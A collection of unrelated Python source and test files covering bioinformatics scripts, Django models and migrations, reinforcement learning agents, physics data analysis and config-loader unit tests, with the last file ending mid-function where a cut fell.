CPG_FORMAT_FILE_RE = re.compile(".+(CRC\d+)_(chr\d+).dummy.pkl.zip")
CPG_FORMAT_FILE_FORMAT = "all_cpg_ratios_*_%s.dummy.pkl.zip"
def parse_input():
parser = argparse.ArgumentParser()
parser.add_argument('--cpg_format_files', help='Path to folder or file of parsed scWGBS', required=True)
parser.add_argument('--output_folder', help='Path of the output folder', required=False)
args = parser.parse_args()
return args
def get_context_as_int_for_chr(chr_info):
return chr_info[:, -3]
def collect_data(df, chr_info):
orph_coloms = ["num_cpg_in_%s" % i for i in NUMBER_OF_ORPH_PER_INDEX]
df.reset_index(drop=True)
sampels = df.axes[0]
pt_index = [i for i in range(len(sampels)) if sampels[i].startswith("PT")]
nc_index = [i for i in range(len(sampels)) if sampels[i].startswith("NC")]
nc_values = df.iloc[nc_index, :].mean(axis=0, skipna=True)
pt_values = df.iloc[pt_index, :].mean(axis=0, skipna=True)
# ones_or_zeros_pt = np.where(np.logical_or(pt_values == 1, pt_values == 0))[0]
# ones_or_zeros_nc = np.where(np.logical_or(nc_values == 1, nc_values == 0))[0]
# together = set(ones_or_zeros_pt) & set(ones_or_zeros_nc)
# nc_values = nc_values.iloc[list(together)]
# pt_values = pt_values.iloc[list(together)]
#
# index = pt_values.axes[0]._values
# location = chr_info[:, 0]
# location = np.in1d(location,index)
# context = chr_info[location, -3]
# orph = chr_info[location, 1:14]
pt_values[pt_values >= HIGH_T] = 1
pt_values[pt_values <= LOW_T] = 0
nc_values[nc_values <= LOW_T] = 0
nc_values[nc_values >= HIGH_T] = 1
ones_or_zeros_pt = np.where(np.logical_or(pt_values == 1, pt_values == 0))[0]
ones_or_zeros_nc = np.where(np.logical_or(nc_values == 1, nc_values == 0))[0]
# nc_values = nc_values.iloc[list(together)]
# pt_values = pt_values.iloc[list(together)]
pt_values[~np.logical_or(pt_values == 1, pt_values == 0)] = 2
nc_values[~np.logical_or(nc_values == 1, nc_values == 0)] = 2
location = chr_info[:, 0]
context = chr_info[:, -3]
orph = chr_info[:, 1:14]
# Combine the different tables to one table and than convert to df
final_table = np.hstack(
(location[:, None], context[:, None], orph, nc_values[:, None], pt_values[:, None]))
end_df = pd.DataFrame(final_table, columns=["locations", "context"] + orph_coloms + ["nc", "pt"])
return end_df
def format_args():
"""
Format the args for this script
:return: The path of the files and the output directory
"""
args = parse_input()
output = args.output_folder
if not output:
output = os.path.dirname(sys.argv[0])
if os.path.isdir(args.cpg_format_files):
cpg_format_file_path = os.path.join(args.cpg_format_files, CPG_FORMAT_FILE_FORMAT % '*')
all_cpg_format_file_paths = glob.glob(cpg_format_file_path)
else:
all_cpg_format_file_paths = [args.cpg_format_files]
return all_cpg_format_file_paths, output
def main():
input_files, output_dir = format_args()
for file_path in tqdm(input_files):
cpg_dict = files_tools.get_cpg_context_map()
patient, chromosome = CPG_FORMAT_FILE_RE.findall(file_path)[0]
df = pd.read_pickle(file_path)
data = collect_data(df, cpg_dict[chromosome])
save_output(data, output_dir, file_path)
def save_output(data, output, data_file_path):
"""
Save the data
:param data: The main data of the script
:param output: The output folder
:param data_file_path: The original file path
"""
patient, chromosome = CPG_FORMAT_FILE_RE.findall(data_file_path)[0]
output_csv = os.path.join(output, patient, "%s_all_data.csv.gzip" % chromosome)
if not os.path.exists(os.path.join(output, patient)):
os.mkdir(os.path.join(output, patient))
data.to_csv(output_csv, compression='gzip')
if __name__ == '__main__':
main()
|
import unittest
from migrate import Product, Migrate, BaseReadDB, BaseOutputWriterDB
class ProductTestCase(unittest.TestCase):
def test_create_product_instance(self):
product = Product(description='desc', price=123)
self.assertEqual(product.description, 'desc')
self.assertEqual(product.price, 123)
def test_check_product_true_equivalency(self):
product1 = Product(
description='COLÔNIA DESODORANTE AVON 015 LONDON',
price=134
)
product2 = Product(
description='cOlONiIâ DEZODORRANTE AVÃO 015 LONDON',
price=123
)
self.assertEqual(product1, product2)
def test_check_product_false_equivalency(self):
product1 = Product(
description='COLÔNIA DESODORANTE MUSK MARINE',
price=123
)
product2 = Product(
description='COLÔNIA DESODORANTE MUSK FRESH',
price=134
)
self.assertNotEqual(product1, product2)
class MockReadDB1(BaseReadDB):
STORE = []
def read(self):
for item in self.STORE:
yield item
def close(self):
pass
class MockReadDB2(BaseReadDB):
STORE = []
def read(self):
for item in self.STORE:
yield item
def close(self):
pass
class MockOutputDB(BaseOutputWriterDB):
STORE = []
def writerow(self, row):
self.STORE.append(row)
def __enter__(self):
return self
def __exit__(self, *args):
pass
class MigrateTestCase(unittest.TestCase):
def test_migrate(self):
mock_db1 = MockReadDB1('')
mock_db1.STORE.append(
['COLÔNIA DESODORANTE AVON 300 KM/H MAX TURBO', 250])
mock_db1.STORE.append(['AVON LUCK FOR HIM DEO PARFUM', 50])
mock_db2 = MockReadDB2('')
mock_db2.STORE.append(
['cOlONiIâ DEZODORRANTE AVÃO 300 KM/H MAX TURBO', 100])
mock_db2.STORE.append(['AVÃO luck for him deo parfum', 124])
migrate = Migrate(mock_db1, mock_db2)
output_db_mock = MockOutputDB('')
migrate.run(output_db=output_db_mock)
self.assertListEqual(
output_db_mock.STORE[0],
['COLÔNIA DESODORANTE AVON 300 KM/H MAX TURBO', 100]
)
self.assertListEqual(
output_db_mock.STORE[1],
['AVON LUCK FOR HIM DEO PARFUM', 124],
)
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
MSG = """
%prog <-y> -s filter1 <-s filter2 <-s ...>> -f filterfile file1 file2 file3...
Target files could be pattern strings for globing.
Created on Thu Jun 28 21:10:14 2012 for LSC, MJF, LBH and YSX.
This script was designed for LSC's work on evolution of ST&RM systems in
cyanobacteria. It can extract wanted fasta sequences from your target files
once you specify filter strings in the sequence annotarions.
Filters to specify can be one or more in command line, or inclued in a file,
or both.
Target files in fasta format can be specified as one or more glob patterns.
@author: Yin-Chu WANG
yinchu.wang@gmail.com
"""
from optparse import OptionParser
import glob
from Bio import SeqIO
#MSG='''%prog -x -s filter1 -s filter2 -s ... -f filterfile file1 file2 file3...
# target files could be the string for globing.'''
op=OptionParser(usage=MSG, \
version="%prog 4.0 by YC Wang")
op.add_option("-y", '--yield', action="store_true", dest="cut", help="If you wanna cut from the files." )
op.add_option("-g", '--group', action="store_true", dest="group", help="If you wanna group sequences by filters." )
op.add_option("-s", "--sig", action="append", dest="filterS", help="Give your one or more filter strings for extration.")
op.add_option("-f", "--filters", action="store", dest="filterF", help="Give your fiters inclued in a file")
options, targets = op.parse_args()
# Given all the target files you want, every parameter can be a glob string.
def getglobfiles(targetfiles):
globfiles=[]
for f in targetfiles:
add= glob.glob(f)
globfiles += add
return globfiles
def getfilters(filterstr, filterfile):
filters= []
if filterfile != None:
with open(filterfile) as ff:
for i in ff.readlines():
filters.append(i.strip())
if filterstr != None:
filters.extend(filterstr)
return filters
# extract every satifised sequence from one targer file to a new file
# prefixed X_ and the rest sequences are left in the other new file
# which prefixed Y_.
def targetfilter(filters, targetfile, xymode, gmode):
newx = 0
newy = 0
xhandle = open('X_'+targetfile, "a")
if xymode == True:
yhandle = open('Y_'+targetfile, "a")
if gmode == True:
flthandle = dict()
for flt in filters:
flthandle[flt] = open('G_'+flt, "a")
records = SeqIO.parse(targetfile, "fasta")
for record in records:
isfound = 0
for flt in filters:
if flt in record.description:
isfound = 1
if gmode == True:
SeqIO.write(record, flthandle[flt], "fasta")
if isfound == 1:
newx += 1
SeqIO.write(record, xhandle, "fasta")
else:
newy += 1
if xymode == True:
SeqIO.write(record, yhandle, "fasta")
print '%s has been processed, %d found(X) and %d left(Y).'%(targetfile, newx, newy)
#print xymode
def main(filters, targetfiles, xymode, gmode):
for targetfile in targetfiles:
targetfilter(filters, targetfile, xymode, gmode)
print 'A total number of %d files have been processed successfully! ;)'%(len(targetfiles))
# Go ahead, baby~
filters = getfilters(options.filterS, options.filterF)
targetfiles = getglobfiles(targets)
xymode = options.cut
gmode = options.group
#print xymode
main(filters, targetfiles, xymode, gmode)
|
# Bextest.py tests binning algoritms against an existing .sbn file
#
import shapefile
from hasbeen import HasBeen
from bextree import Tree
from mapper import mapshapefile
from spatialindex import SBN
import sys
if len(sys.argv) > 1:
shpfile = sys.argv[1]
else:
print "Usage: bextest.py [shapefile]"
print "Bins the features in a shapefile and compares it to an existing sbn"
sys.exit()
h = HasBeen(shpfile)
# open up the existing sbn to compare against
sbn = SBN(shpfile + ".sbn")
# compare the generated sbn versus ESRI's
for id, bin in enumerate(sbn.bins):
if id ==0 : continue
a = len(bin.features) == len(h.bins[id].features)
if not a:
print "Bin %s -" % id,
print "E: %s, L:%s" % (len(bin.features), len(h.bins[id].features))
if len(bin.features) > 0:
tb = bin.features
else:
tb = h.bins[id].features
xmin = 255
ymin = 255
xmax = 0
ymax = 0
for f in tb:
print "%s," % f.id,
xmin = min(xmin,f.xmin)
ymin = min(ymin,f.ymin)
xmax = max(xmax,f.xmax)
ymax = max(ymax,f.ymax)
print "\n f_bbox %s-%s,%s-%s" % (xmin,xmax,ymin,ymax)
node = t.nodes[id]
print " node %s-%s,%s-%s/%s\n" % (node.xmin,node.xmax,node.ymin,node.ymax,node.splitcoord)
|
from flask import Flask, request, render_template
from indexer import *
from searcher import *
app = Flask(__name__)
init_flag = 0
@app.route('/')
def default():
return render_template('main.html')
@app.route('/', methods=['POST'])
def my_form_post():
query = request.form['query']
if not query:
return render_template("resultNotFound.html")
#return "error no query found"
else:
# global init_flag
# test = init_flag
# print "\n--------" + str(test) + "_______\n"
# if not test:
# print "THIS IS THE FIRST POST REQUEST"
# #lucene.initVM()
# init_flag = 1
results = search_abstract(query)
# print results
#results = search(searcher, analyzer, GLOBALDIRECTORY, query) #keepsearching till enter
return render_template('resultFound.html', outputs=results)
|
from cvxopt import matrix, solvers
import numpy as np
def irl(n_states, n_actions, transition_probability, policy, discount, Rmax, l1):
A = set(range(n_actions))
# shape (A, N, N).
transition_probability = np.transpose(transition_probability, (1, 0, 2))
def T(a, s):
"""
Shorthand for a dot product used a lot in the LP formulation.
"""
return np.dot(transition_probability[policy[s], s] -
transition_probability[a, s],
np.linalg.inv(np.eye(n_states) -
discount*transition_probability[policy[s]]))
# This entire function just computes the block matrices used for the LP
# formulation of IRL.
# Minimise c . x.
c = -np.hstack([np.zeros(n_states), np.ones(n_states),
-l1*np.ones(n_states)])
zero_stack1 = np.zeros((n_states*(n_actions-1), n_states))
T_stack = np.vstack([
-T(a, s)
for s in range(n_states)
for a in A - {policy[s]}
])
I_stack1 = np.vstack([
np.eye(1, n_states, s)
for s in range(n_states)
for a in A - {policy[s]}
])
I_stack2 = np.eye(n_states)
zero_stack2 = np.zeros((n_states, n_states))
D_left = np.vstack([T_stack, T_stack, -I_stack2, I_stack2])
D_middle = np.vstack([I_stack1, zero_stack1, zero_stack2, zero_stack2])
D_right = np.vstack([zero_stack1, zero_stack1, -I_stack2, -I_stack2])
D = np.hstack([D_left, D_middle, D_right])
b = np.zeros((n_states*(n_actions-1)*2 + 2*n_states, 1))
bounds = np.array([(None, None)]*2*n_states + [(-Rmax, Rmax)]*n_states)
# We still need to bound R. To do this, we just add
# -I R <= Rmax 1
# I R <= Rmax 1
# So to D we need to add -I and I, and to b we need to add Rmax 1 and Rmax 1
D_bounds = np.hstack([
np.vstack([
-np.eye(n_states),
np.eye(n_states)]),
np.vstack([
np.zeros((n_states, n_states)),
np.zeros((n_states, n_states))]),
np.vstack([
np.zeros((n_states, n_states)),
np.zeros((n_states, n_states))])])
b_bounds = np.vstack([Rmax*np.ones((n_states, 1))]*2)
D = np.vstack((D, D_bounds))
b = np.vstack((b, b_bounds))
A_ub = matrix(D)
b = matrix(b)
c = matrix(c)
results = solvers.lp(c, A_ub, b)
r = np.asarray(results["x"][:n_states], dtype=np.double)
return r.reshape((n_states,))
|
""" Functionality to analyse bias triangles
@author: amjzwerver
"""
# %%
import numpy as np
import qtt
import qtt.pgeometry
import matplotlib.pyplot as plt
from qcodes.plots.qcmatplotlib import MatPlot
from qtt.data import diffDataset
def plotAnalysedLines(clicked_pts, linePoints1_2, linePt3_vert, linePt3_horz, linePt3_ints, intersect_point):
""" Plots lines based on three points clicked.
Args:
clicked_pts (array): lines between the three points (1-2), (2-3).
linePoints1_2 (array): line fitted through points 1 and 2.
linePt3_vert (array): vertical line through point 3.
linePt3_horz (array): horizontal line through point 3.
linePt3_ints (array): line through point 3 and its vert/horz intersection
with the line through point 1,2.
intersect_point (array): intersection point point 3, line1_2.
"""
qtt.pgeometry.plot2Dline(linePoints1_2, ':c', alpha=.5)
qtt.pgeometry.plot2Dline(linePt3_vert, ':b', alpha=.4)
qtt.pgeometry.plot2Dline(linePt3_horz, ':b', alpha=.4)
qtt.pgeometry.plot2Dline(linePt3_ints, ':b', alpha=.4)
qtt.pgeometry.plotPoints(intersect_point, '.b')
qtt.pgeometry.plotPoints(clicked_pts[:, 2:3], '.b')
linePt3_ints_short = np.column_stack((intersect_point, clicked_pts[:, 2:3]))
qtt.pgeometry.plotPoints(linePt3_ints_short, 'b')
def perpLineIntersect(ds, description, vertical=True, points=None, fig=588, diff_dir='xy'):
""" Takes three points in a graph and calculates the length of a linepiece
between a line through points 1,2 and a vertical/horizontal line
through the third point. Uses the currently active figure.
Args:
ds (dataset): dataset with charge stability diagram and gate voltage in mV.
description: TODO
vertical (bool): find intersection of point with line vertically (True)
or horizontally (False).
points (None or array): if None, then let the user select points.
fig (int): figure number.
diff_dir (None or 'xy'): specification of differentiation direction.
Returns:
(dict): 'intersection_point' = intersection point
'distance' = length of line from 3rd clicked point to line
through clicked points 1 and 2
'clicked_points' = coordinates of the three clicked points
"""
if diff_dir is not None:
diffDataset(ds, diff_dir='xy')
array_name = 'diff_dir_xy'
else:
array_name = ds.default_parameter_name()
plt.figure(fig)
plt.clf()
MatPlot(ds.arrays[array_name], num=fig)
ax = plt.gca()
ax.set_autoscale_on(False)
if description == 'lever_arm' and vertical:
print('''Please click three points;
Point 1: on the addition line for the dot represented on the vertical axis
Point 2: further on the addition line for the dot represented on the vertical axis
Point 3: on the triple point at the addition line for the dot represented on the horizontal axis
where both dot levels are aligned''')
elif description == 'lever_arm' and not vertical:
print('''Please click three points;
Point 1: on the addition line for the dot represented on the horizontal axis
Point 2: further on the addition line for the dot represented on the horizontal axis
Point 3: on the triple point at the addition line for the dot represented on the horizontal axis
where both dot levels are aligned''')
elif description == 'E_charging':
print('''Please click three points;
Point 1: on the (0, 1) - (0,2) addition line
Point 2: further on the (0, 1) - (0,2) addition line
Point 3: on the (0, 0) - (0, 1) addition line ''')
else:
# Do something here such that no three points need to be clicked
raise Exception('''Please make sure that the description argument of this function
is either 'lever_arm' or 'E_charging' ''')
if points is not None:
clicked_pts = points
else:
plt.title('Select three points')
plt.draw()
plt.pause(1e-3)
clicked_pts = qtt.pgeometry.ginput(3, '.c')
qtt.pgeometry.plotPoints(clicked_pts, ':c')
qtt.pgeometry.plotLabels(clicked_pts)
linePoints1_2 = qtt.pgeometry.fitPlane(clicked_pts[:, 0:2].T)
yy = clicked_pts[:, [2, 2]]
yy[1, -1] += 1
line_vertical = qtt.pgeometry.fitPlane(yy.T)
xx = clicked_pts[:, [2, 2]]
xx[0, -1] += 1
line_horizontal = qtt.pgeometry.fitPlane(xx.T)
if vertical:
i = qtt.pgeometry.intersect2lines(linePoints1_2, line_vertical)
intersectPoint = qtt.pgeometry.dehom(i)
line = intersectPoint[:, [0, 0]]
line[0, -1] += 1
else:
i = qtt.pgeometry.intersect2lines(linePoints1_2, line_horizontal)
intersectPoint = qtt.pgeometry.dehom(i)
line = intersectPoint[:, [0, 0]]
line[1, -1] += 1
linePt3_ints = qtt.pgeometry.fitPlane(line.T)
line_length = np.linalg.norm(intersectPoint - clicked_pts[:, 2:3])
# visualize
plotAnalysedLines(clicked_pts, linePoints1_2, line_vertical, line_horizontal, linePt3_ints, intersectPoint)
return {'intersection_point': intersectPoint, 'distance': line_length, 'clicked_points': clicked_pts,
'array_names': [array.name for array in ds.default_parameter_array().set_arrays]}
def lever_arm(bias, results, fig=None):
""" Calculates the lever arm of a dot by using bias triangles in charge sensing. Uses currently active figure.
Args:
bias (float): bias in uV between source and drain while taking the bias triangles.
results (dict): dictionary returned from the function perpLineIntersect
containing three points, the intersection point
between a line through 1,2 and the third point and the
length from points 3 to the intersection (horz/vert).
fig (bool): adds lever arm to title of already existing figure with points.
Returns:
lev_arm (float): the lever arm of the assigned dot in uV/mV.
"""
line_length = results['distance']
# in uV/mV
lev_arm = abs(bias / line_length)
if fig and len(plt.get_fignums()) != 0:
ax = plt.gca()
ax.set_autoscale_on(False)
if np.round(results['clicked_points'][0, 2], 2) == np.round(results['intersection_point'][0], 2):
gate = ax.get_ylabel()
else:
gate = ax.get_xlabel()
title = r'Lever arm %s: %.2f $\mu$eV/mV' % (gate, lev_arm)
plt.annotate('Length %s: %.2f mV' % (gate, line_length), xy=(0.05, 0.1), xycoords='axes fraction', color='k')
plt.annotate(title, xy=(0.05, 0.05), xycoords='axes fraction', color='k')
ax.set_title(title)
return lev_arm
def E_charging(lev_arm, results, fig=None):
"""
Calculates the charging energy of a dot by using charge stability diagrams.
Uses currently active figure.
Args:
lev_arm (float): lever arm for the gate to the dot.
results (dict): dictionary returned from the function perpLineIntersect
containing three points, the intersection point
between a line through 1,2 and the third point and the
length from points 3 to the intersection (horz/vert).
fig (bool): adds charging energy to title of already existing figure with points.
Returns:
E_charging (float): the charging energy for the dot.
"""
line_length = results['distance']
E_c = line_length * lev_arm
if fig and len(plt.get_fignums()) != 0:
ax = plt.gca()
ax.set_autoscale_on(False)
if np.round(results['clicked_points'][0, 2], 2) == np.round(results['intersection_point'][0], 2):
gate = ax.get_ylabel()[:2]
else:
gate = ax.get_xlabel()[:2]
title = 'E_charging %s: %.2f meV' % (gate, E_c / 1000)
plt.annotate('Length %s: %.2f mV' % (gate, line_length), xy=(0.05, 0.1), xycoords='axes fraction', color='k')
plt.annotate(title, xy=(0.05, 0.05), xycoords='axes fraction', color='k')
ax.set_title(title)
return E_c
|
from rest_framework import serializers
from apps.civic_pulse.models import Agency, Entry
class AgencySerializer(serializers.ModelSerializer):
class Meta:
model = Agency
fields = ['id','name','website','twitter','facebook','phone_number','address','description','last_successful_scrape','scrape_counter','notes']
class EntrySerializer(serializers.ModelSerializer):
class Meta:
model = Entry
fields = ['id','agency','https_enabled','has_privacy_policy','mobile_friendly','good_performance','has_social_media','has_contact_info','notes']
|
# -*- coding: utf-8 -*-
"""
This modual is used for all of the functions related to videos
"""
import cv2
import numpy as np
class Video(object):
"""
This class is used to create the functions that are used for each of the
videos
"""
def __init__(self, path_to_video=0):
self.video = list()
capture = cv2.VideoCapture(path_to_video)
videoReturn = True
counter = 1
while videoReturn:
videoReturn, frame = capture.read()
counter += 1
self.numberOfRows = capture.get(4)
self.numberOfColumns = capture.get(3)
self.video.append(frame)
if path_to_video == 0:
cv2.imshow("Frame", frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
self.numberOfFrames = counter
class CombinedVideos(object):
"""
This class is used to create the combined video
"""
def __init__(self, videos=None, grid = (3,3)):
"""
This function creates the combined video object in a grid
:param videos:
:param grid:
"""
self.videos = videos
self.combined_videos = None
self.grid = grid
self.max_number_of_videos = grid[0]*grid[1]
self.rows = list()
def combine_videos(self):
"""
This function combines the videos into one array
"""
row = list()
for count, video in enumerate(self.videos):
if self.max_number_of_videos <= count:
break
if count % self.grid[0] == 0 and count > 0:
self.rows.append(row)
row = list()
row.append(video)
self.rows.append(row)
for frameNumber in range(self.rows[0][0].numberOfFrames):
print("Tired")
def save_video(self, name):
"""
This function saves the video
:param name:
"""
raise NotImplementedError
|
"""VISA communication interface for SCPI-based instrument remote control.
:version: 1.18.0.73
:copyright: 2020 by Rohde & Schwarz GMBH & Co. KG
:license: MIT, see LICENSE for more details.
"""
__version__ = '1.18.0.73'
# Main class
from RsInstrument.RsInstrument import RsInstrument
# Bin data format
from RsInstrument.RsInstrument import BinFloatFormat, BinIntFormat
# Exceptions
from RsInstrument.Internal.InstrumentErrors import RsInstrException, TimeoutException, StatusException, UnexpectedResponseException, ResourceError, DriverValueError
# Callback Event Argument prototypes
from RsInstrument.Internal.IoTransferEventArgs import IoTransferEventArgs
# Logging Mode
from RsInstrument.Internal.ScpiLogger import LoggingMode
|
#!/usr/bin/env python2.6
import os
import pytest
from UnofficialDDNS import __doc__ as uddns_doc
from UnofficialDDNS import __version__ as uddns_ver
from docopt import docopt
import libs
def test_config_file_only_with_invalid_binary_data(config_file):
config_file.write(os.urandom(1024))
config_file.flush()
argv = ['-c', config_file.name]
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Unable to read config file %s, invalid data." % config_file.name == str(e.value)
def test_config_file_only_with_nonexistent_file():
argv = ['-c', '/tmp/doesNotExist.28520']
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Config file /tmp/doesNotExist.28520 does not exist, not a file, or no permission." == str(e.value)
def test_config_file_only_with_no_read_permissions():
argv = ['-c', '/etc/sudoers']
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Unable to read config file /etc/sudoers." == str(e.value)
def test_config_file_only_with_directory_instead_of_file():
argv = ['-c', '/etc']
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Config file /etc does not exist, not a file, or no permission." == str(e.value)
def test_config_file_only_with_invalid_text_data_not_yaml(config_file):
config_file.write("daemon\n")
config_file.flush()
argv = ['-c', config_file.name]
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Config file %s contents didn't yield dict or not YAML: daemon" % config_file.name == str(e.value)
def test_config_file_only_with_invalid_text_data_not_yaml_big(config_file):
config_file.write("""
domain mydomain.com # i am a comment
user thisuser#comment
#another comment
passwd abc"
""")
config_file.flush()
argv = ['-c', config_file.name]
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Config file %s contents not YAML formatted:" % config_file.name in str(e.value)
def test_config_file_only_with_invalid_text_data_unknown_option(config_file):
config_file.write("test: true\n")
config_file.flush()
argv = ['-c', config_file.name]
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Unknown option test in config file %s." % config_file.name == str(e.value)
def test_config_file_only_with_invalid_text_data_unknown_value(config_file):
config_file.write("daemon: unknown\n")
config_file.flush()
argv = ['-c', config_file.name]
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Config file option daemon must be True or False." == str(e.value)
def test_config_file_only_missing_log_value(config_file):
config_file.write("domain: mydomain.com\nuser: thisuser\npasswd: abc\nlog: #True\n")
config_file.flush()
argv = ['-c', config_file.name]
config = libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert None == config['log']
def test_config_file_only_tab_character(config_file):
config_file.write("domain: mydomain.com\nuser:\tthisuser\npasswd: abc")
config_file.flush()
argv = ['-c', config_file.name]
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Tab character found in config file %s. Must use spaces only!" % config_file.name == str(e.value)
def test_config_file_only_with_full_valid_data(config_file):
config_file.write("domain: mydomain.com\nuser: thisuser\npasswd: abc")
config_file.flush()
argv = ['-c', config_file.name]
expected = dict(log=None, daemon=False, verbose=False, interval=60, pid=None, quiet=False, version=False,
registrar='name.com', config=config_file.name, help=False,
user='thisuser', passwd='abc', domain='mydomain.com')
actual = libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert expected == actual
def test_config_file_only_with_full_valid_data_and_comments(config_file):
config_file.write("""
domain: mydomain.com # i am a comment
user: thisuser #comment
#another comment
passwd: abc
""")
config_file.flush()
argv = ['-c', config_file.name]
expected = dict(log=None, daemon=False, verbose=False, interval=60, pid=None, quiet=False, version=False,
registrar='name.com', config=config_file.name, help=False,
user='thisuser', passwd='abc', domain='mydomain.com')
actual = libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert expected == actual
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-29 12:13
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('initiatives', '0021_auto_20191129_1132'),
]
operations = [
migrations.RemoveField(
model_name='initiativeplatformsettings',
name='search_filters',
),
]
|
from django.contrib import admin
from cms.extensions import PageExtensionAdmin
from .models import MetaAttributes
class MetaAttributesAdmin(PageExtensionAdmin):
exclude = ['plugins']
admin.site.register(MetaAttributes, MetaAttributesAdmin)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-06 11:51
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Card',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('word', models.CharField(max_length=60, unique=True)),
('description', models.TextField(blank=True, null=True)),
('difficulty', models.CharField(choices=[('easy', 'Easy'), ('middle', 'Middle'), ('difficult', 'Difficult')], default='difficult', max_length=10)),
('created_date', models.DateTimeField(auto_now_add=True)),
('changed_date', models.DateTimeField(auto_now=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cards', to=settings.AUTH_USER_MODEL)),
],
),
]
|
import numpy as np
import torch
import torch.optim as optim
import torch.nn.functional as F
from agents.common.networks import *
class Agent(object):
"""An implementation of the Advantage Actor-Critic (A2C) agent."""
def __init__(self,
env,
args,
device,
obs_dim,
act_num,
steps=0,
gamma=0.99,
policy_lr=1e-4,
vf_lr=1e-3,
eval_mode=False,
policy_losses=list(),
vf_losses=list(),
logger=dict(),
):
self.env = env
self.args = args
self.device = device
self.obs_dim = obs_dim
self.act_num = act_num
self.steps = steps
self.gamma = gamma
self.policy_lr = policy_lr
self.vf_lr = vf_lr
self.eval_mode = eval_mode
self.policy_losses = policy_losses
self.vf_losses = vf_losses
self.logger = logger
# Policy network
self.policy = CategoricalPolicy(self.obs_dim, self.act_num, activation=torch.tanh).to(self.device)
# Value network
self.vf = MLP(self.obs_dim, 1, activation=torch.tanh).to(self.device)
# Create optimizers
self.policy_optimizer = optim.Adam(self.policy.parameters(), lr=self.policy_lr)
self.vf_optimizer = optim.Adam(self.vf.parameters(), lr=self.vf_lr)
def select_action(self, obs):
"""Select an action from the set of available actions."""
action, _, log_pi = self.policy(obs)
# Prediction V(s)
v = self.vf(obs)
# Add logπ(a|s), V(s) to transition list
self.transition.extend([log_pi, v])
return action.detach().cpu().numpy()
def train_model(self):
log_pi, v, reward, next_obs, done = self.transition
# Prediction V(s')
next_v = self.vf(torch.Tensor(next_obs).to(self.device))
# Target for Q regression
q = reward + self.gamma*(1-done)*next_v
q.to(self.device)
# Advantage = Q - V
advant = q - v
if 0: # Check shape of prediction and target
print("q", q.shape)
print("v", v.shape)
print("log_pi", log_pi.shape)
# A2C losses
policy_loss = -log_pi*advant.detach()
vf_loss = F.mse_loss(v, q.detach())
# Update value network parameter
self.vf_optimizer.zero_grad()
vf_loss.backward()
self.vf_optimizer.step()
# Update policy network parameter
self.policy_optimizer.zero_grad()
policy_loss.backward()
self.policy_optimizer.step()
# Save losses
self.policy_losses.append(policy_loss.item())
self.vf_losses.append(vf_loss.item())
def run(self, max_step):
step_number = 0
total_reward = 0.
images = []
obs = self.env.reset()
done = False
# Keep interacting until agent reaches a terminal state.
while not (done or step_number == max_step):
if self.args.render:
images.append(self.env.render('rgb_array'))
if self.eval_mode:
_, pi, _ = self.policy(torch.Tensor(obs).to(self.device))
action = pi.argmax().detach().cpu().numpy()
next_obs, reward, done, _ = self.env.step(action)
else:
self.steps += 1
# Create a transition list
self.transition = []
# Collect experience (s, a, r, s') using some policy
action = self.select_action(torch.Tensor(obs).to(self.device))
next_obs, reward, done, _ = self.env.step(action)
# Add (r, s') to transition list
self.transition.extend([reward, next_obs, done])
self.train_model()
total_reward += reward
step_number += 1
obs = next_obs
# Save total average losses
self.logger['LossPi'] = round(np.mean(self.policy_losses), 5)
self.logger['LossV'] = round(np.mean(self.vf_losses), 5)
return step_number, total_reward, images
|
#version 1
#
#
#Setup data structure
#Made timer that includes fps
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph.opengl as gl
import pyqtgraph as pg
import numpy as np
import random
#import time
from pyqtgraph.ptime import time
import functools
app = QtGui.QApplication([])
w = gl.GLViewWidget()
w.show()
g = gl.GLGridItem()
w.addItem(g)
def nearFunction(mat,i,j,k):
return mat[i+1,j,k-1] or mat[i,j+1,k-1] or mat[i,j,k-1] or \
mat[i-1,j,k] or mat[i,j-1,k] or mat[i,j,k-1] or \
mat[i+2,j,k] or mat[i,j+2,k] or \
mat[i-2,j,k] or mat[i,j-2,k] or mat[i,j,k-2]
def makeSeedRand(mat):
row, col, layer = mat.shape
for i in range(2, row-2):
for j in range(2, col-2):
for k in range(2, layer-2):
#p = 0.311
p = 0.211
randNum = random.uniform(0, 1)
if(randNum <= p):
mat[i,j,k] = 1
#matB[i,j,k] = 1
# if(1*(row/3) < i and i < 2*(row/3)): #middle third
# if(1*(col/3) < j and j < 2*(col/3)): #middle third
# if(k < 1*(layer/3)):
